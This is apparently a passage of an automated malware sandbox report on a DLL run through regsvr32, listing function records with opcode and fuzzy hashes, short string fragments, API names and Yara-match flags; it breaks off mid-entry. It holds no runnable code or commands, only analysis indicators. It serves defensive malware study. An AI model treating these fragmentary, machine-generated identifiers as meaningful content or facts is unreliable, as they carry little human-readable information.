                                                                                                                                • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                                                                                • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 5T$7c
                                                                                                                                • API String ID: 0-2666566123
                                                                                                                                • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                                                                                • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ",)x$PX
                                                                                                                                • API String ID: 0-926260526
                                                                                                                                • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                                                                                • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                • Instruction ID: 4372841d88d4d60d7093200b1980131e20ca047403c329814e9786e38b2bba7a
                                                                                                                                • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                • Instruction Fuzzy Hash: D7115EB2A086078BFB188B31C0953B937E0FB94B29F544435C60D462F6DF7CD5A58786
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFFEFB95A8C), ref: 00007FFFEFB9C8FD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                • Instruction ID: 2cae8c26008a14e4ddea24875f7e543b323329a939aa06a867c6343099036fd6
                                                                                                                                • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                • Instruction Fuzzy Hash: 0AF0A4A2E0850746FB199B31C4153B937D1AB94B54F189031C64D422F6CF6CD5918242
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: H&0
                                                                                                                                • API String ID: 0-1691334370
                                                                                                                                • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                                                                                • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <+o
                                                                                                                                • API String ID: 0-2035106886
                                                                                                                                • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                                                                                • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 2d
                                                                                                                                • API String ID: 0-3866551247
                                                                                                                                • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                                                                                • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ZF{;
                                                                                                                                • API String ID: 0-2351138993
                                                                                                                                • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                                                                                • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: o^
                                                                                                                                • API String ID: 0-3380573087
                                                                                                                                • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                                                                                • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8N
                                                                                                                                • API String ID: 0-1657423088
                                                                                                                                • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                                                                                • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: J3n
                                                                                                                                • API String ID: 0-3694000235
                                                                                                                                • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                                                                                • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: c&A
                                                                                                                                • API String ID: 0-649646960
                                                                                                                                • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                                                                                • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (3
                                                                                                                                • API String ID: 0-2570504824
                                                                                                                                • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                                                                                • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: [r\^
                                                                                                                                • API String ID: 0-4041245994
                                                                                                                                • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                                                                                • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X
                                                                                                                                • API String ID: 0-1684620495
                                                                                                                                • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                                                                                • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: [[x
                                                                                                                                • API String ID: 0-2553898450
                                                                                                                                • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                                                                                • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: g\&
                                                                                                                                • API String ID: 0-1994035986
                                                                                                                                • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                                                                                • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X
                                                                                                                                • API String ID: 0-1684620495
                                                                                                                                • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                                                                                • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: GfMu
                                                                                                                                • API String ID: 0-241548529
                                                                                                                                • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                                                                                • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: k|
                                                                                                                                • API String ID: 0-998972391
                                                                                                                                • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                                                                                • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: wz_
                                                                                                                                • API String ID: 0-2163964638
                                                                                                                                • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                                                                                • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: {?Q
                                                                                                                                • API String ID: 0-927583641
                                                                                                                                • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                                                                                • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: |}6\
                                                                                                                                • API String ID: 0-3074799505
                                                                                                                                • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                                                                                • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 3&a
                                                                                                                                • API String ID: 0-537350193
                                                                                                                                • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                                                                                • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: o0:X
                                                                                                                                • API String ID: 0-645126758
                                                                                                                                • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                                                                                • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: D4}
                                                                                                                                • API String ID: 0-491520632
                                                                                                                                • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
